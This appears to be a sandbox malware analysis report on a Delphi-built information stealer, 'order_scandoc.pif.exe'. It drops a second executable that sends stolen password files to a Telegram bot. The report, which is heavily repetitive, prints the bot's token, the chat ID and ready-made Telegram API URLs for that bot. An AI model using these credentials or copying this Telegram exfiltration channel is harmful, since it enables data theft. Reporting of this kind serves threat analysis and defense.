File name:

order_scandoc.pif.exe

Full analysis: https://app.any.run/tasks/340f7eef-aa9d-464a-9a14-64393c243066
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: September 23, 2025, 16:26:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
evasion
delphi
telegram
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 9 sections
MD5:

F0F00EBA3EF4C38CB7B77E20C4DA7D56

SHA1:

FA817BFCAFCC8B3633AFA3FB226F3345A160656D

SHA256:

F13039143D51037059A436504EAD9C3100CB9E500F02CC7E43055C93C0ED9597

SSDEEP:

49152:QMi9iqlK0i2/ygG6p5nx7RVGpL5WDrhMnciJ7UyCPw3mG893je3oRe/rb9xGpqL3:a9TDu6y5WDrhkciZUhPwWR3je3VDbX0l

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • order_scandoc.pif.exe (PID: 6264)

    • Reads security settings of Internet Explorer

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)

    • Checks for external IP

      • ykwhenrvO.exe (PID: 2064)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • ykwhenrvO.exe (PID: 2064)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • ykwhenrvO.exe (PID: 2064)

  • INFO

    • Checks supported languages

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)

    • Checks proxy server information

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)
      • slui.exe (PID: 1236)

    • Reads the computer name

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)

    • The sample compiled with english language support

      • order_scandoc.pif.exe (PID: 6264)

    • Compiled with Borland Delphi (YARA)

      • order_scandoc.pif.exe (PID: 6264)

    • Reads the machine GUID from the registry

      • ykwhenrvO.exe (PID: 2064)

    • Creates files or folders in the user directory

      • ykwhenrvO.exe (PID: 2064)

    • Reads the software policy settings

      • ykwhenrvO.exe (PID: 2064)
      • slui.exe (PID: 1236)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(2064) ykwhenrvO.exe
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocu
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admi
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admi
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocu
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
No Malware configuration.

TRiD

.scr | Windows screen saver (43.2)
.dll | Win32 Dynamic Link Library (generic) (21.7)
.exe | Win32 Executable (generic) (14.8)
.exe | Win16/32 Executable Delphi generic (6.8)
.exe | Generic Win/DOS Executable (6.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 1992:06:19 22:22:17+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Bytes reversed lo, 32-bit, Bytes reversed hi
PEType: PE32
LinkerVersion: 2.25
CodeSize: 515072
InitializedDataSize: 1141248
UninitializedDataSize: -
EntryPoint: 0x7f7bc
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start order_scandoc.pif.exe ykwhenrvo.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1236C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2064C:\\Users\\Public\\ykwhenrvO.exeC:\Users\Public\ykwhenrvO.exe
order_scandoc.pif.exe
User:
admin
Company:
David Harris
Integrity Level:
MEDIUM
Description:
Mercury/32 Loader Module v4.62
Version:
4.62
Modules
Images
c:\users\public\ykwhenrvo.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvbvm60.dll
ims-api
(PID) Process(2064) ykwhenrvO.exe
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocu
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admi
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
